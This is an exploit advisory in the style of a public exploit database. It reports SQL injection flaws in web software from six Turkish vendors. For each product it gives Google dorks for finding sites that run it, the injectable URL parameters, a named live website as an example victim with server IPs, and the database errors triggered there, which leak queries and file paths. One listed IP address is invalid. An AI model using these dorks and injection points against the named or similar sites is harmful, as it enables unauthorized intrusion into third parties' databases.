####################################################################
# Exploit Title : DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/01/2019
# Vendor Homepages of 6 Products :
1) devsoft.com.tr
2) btmbilisim.com ~ btmarge.com
3) algoritma.com.tr
4) mplusnet.com
5) webicerik.com
6) verisay.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################
# There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
***************************************************************************
1) Web Yazılım Devsoft Turkish SQL Injection Vulnerability => [ Vendor ] => devsoft.com.tr
2) BTMArgeBilişim SQL Injection Vulnerability => [ Vendor ] => btmbilisim.com ~ btmarge.com
3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability => [ Vendor ] => algoritma.com.tr
4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability => [ Vendor ] => mplusnet.com
5) Webİcerik SQL Injection Vulnerability => [ Vendor ] => webicerik.com
6) Verisay Web Tasarım SQL Injection Vulnerability => [ Vendor ] => verisay.com
####################################################################
# Google Dorks for Vulnerable Different Products ;
********************************************
1) intext:''Web Yazılım: Devsoft''
2) intext:''Tüm hakları saklıdır. BTM ARGE.''
3) intext:''www.algoritma.com.tr"
4) intext:''Powered By M.Ceylan'' site:tr
5) intext:Webİcerik Kurumsal
6) intext:Verisay Web Tasarım
####################################################################
1) Web Yazılım Devsoft SQL Injection Vulnerability
********************************************
# Google Dork :
****************
intext:''Web Yazılım: Devsoft''
# SQL Injection Exploit :
**********************
/urunler.php?id=[SQL Injection]
/page.php?id=[SQL Injection]
/haber.php?id=[SQL Injection]
# Example Vulnerable Site :
************************
[+] adabroker.com.tr/urunler.php?id=90%27
Note : (94.73.151.155) => There are 338 domains hosted on this server.
Note : (159.69.91.216) => There are 44 domains hosted on this server.
# SQL Database Error :
*********************
HATA : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
####################################################################
2) BTMArgeBilişim SQL Injection Vulnerability
****************************************
# Google Dork :
****************
intext:''Tüm hakları saklıdır. BTM ARGE.''
# SQL Injection Exploit :
**********************
/urun_detay.php?ID=[SQL Injection]
# Example Vulnerable Site :
************************
[+] habibmetal.com/urun_detay.php?ID=1'
Note : (213.128.66.82) => There are 543 domains hosted on this server.
Note : (35.243.133.12) => There are 2 domains hosted on this server.
# SQL Database Error :
**********************
Notice: Undefined index: GBilgi in /home/habibmetal/public_html/incfi/inc_footer.php on line 12
####################################################################
3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability
**********************************************************
# Google Dork :
****************
intext:''www.algoritma.com.tr"
# SQL Injection Exploit :
**********************
/urun.php?id=[SQL Injection]
/urunler.php?id=[SQL Injection]
# Example Vulnerable Site :
************************
[+] ozgordal.com.tr/urun.php?id=15%27
Note : (94.73.146.96) => There are 220 domains hosted on this server.
Note : (93.187.206.206) => There are 693 domains hosted on this server.
# SQL Database Error :
**********************
select * from yenilikler where id=15'
select * from kategoriler where id=6'
####################################################################
4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability
**************************************************
# Google Dork :
****************
intext:''Powered By M.Ceylan'' site:tr
# SQL Injection Exploit :
**********************
/match.php?id_match=[SQL Injection]
/lig/consult/istatistik.php?equipe=[SQL Injection]
# Example Vulnerable Site :
************************
[+] alanyaspor.org.tr/match.php?id_match=871%27
Note : (31.169.73.251) => There are 1 domains hosted on this server.
Note : (31.169.73.242) => There are 58 domains hosted on this server.
# SQL Database Error :
**********************
Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/alanyaspor/public_html/match.php on line 62
####################################################################
5) Webİcerik SQL Injection Vulnerability
************************************
# Google Dork :
****************
intext:Webİcerik Kurumsal
# SQL Injection Exploit :
**********************
/index.php?page=mod_video_goster&videoID=[SQL Injection]
/ENG/index.php?page=icerikgoster&menuID=[SQL Injection]
# Example Vulnerable Site :
************************
tcma.org.tr/index.php?page=mod_video_goster&videoID=12%27
Note : (77.92.99.319) => 1 Domain.
Note : (77.92.99.31) => There are 13 domains hosted on this server.
# SQL Database Error :
**********************
Warning: mysql_fetch_assoc(): supplied argument is not a valid
MySQL result resource in /var/www/vhosts/tcma.org.tr
/tcma.org.tr/ENG/lib/emit_icerik.php on line 323
####################################################################
6) Verisay Web Tasarım SQL Injection Vulnerability
*********************************************
# Google Dork :
****************
intext:Verisay Web Tasarım
# SQL Injection Exploit :
**********************
/urunler/urun_detay.php?id=[SQL Injection]
# Example Vulnerable Site :
************************
[+] irena.com.tr/urunler/urun_detay.php?id=1465%27
Note : (89.19.29.4) => There are 130 domains hosted on this server.
Note : (52.19.74.107) => There are 10 domains hosted on this server.
# SQL Database Error :
**********************
SELECT DEGER FROM gnl_ayarlar WHERE ANAHTAR='SITEBASLIK'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean
given in D:\vhosts\irena.com.tr\http\libs\lib-data.php on line 15
SELECT d.ID, d.SIPARIS_ID, d.URUN_ID, d.MIKTAR, sto_kod AS KOD,
sto_birim2_katsayi AS QUANTITY, sto_birim2_boy * sto_birim2_en *
sto_birim2_yukseklik / 1000000000 AS VOLUME, sto_birim2_agirlik AS
GROSSWEIGHT, sfiyat_fiyati AS UNIT_PRICE FROM sip_siparis_detay
d LEFT JOIN sip_siparis s ON s.ID = d.SIPARIS_ID LEFT JOIN urun_urun
u ON u.ID = d.URUN_ID WHERE DURUM = 0 AND s.MUSTERI_ID = ''
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################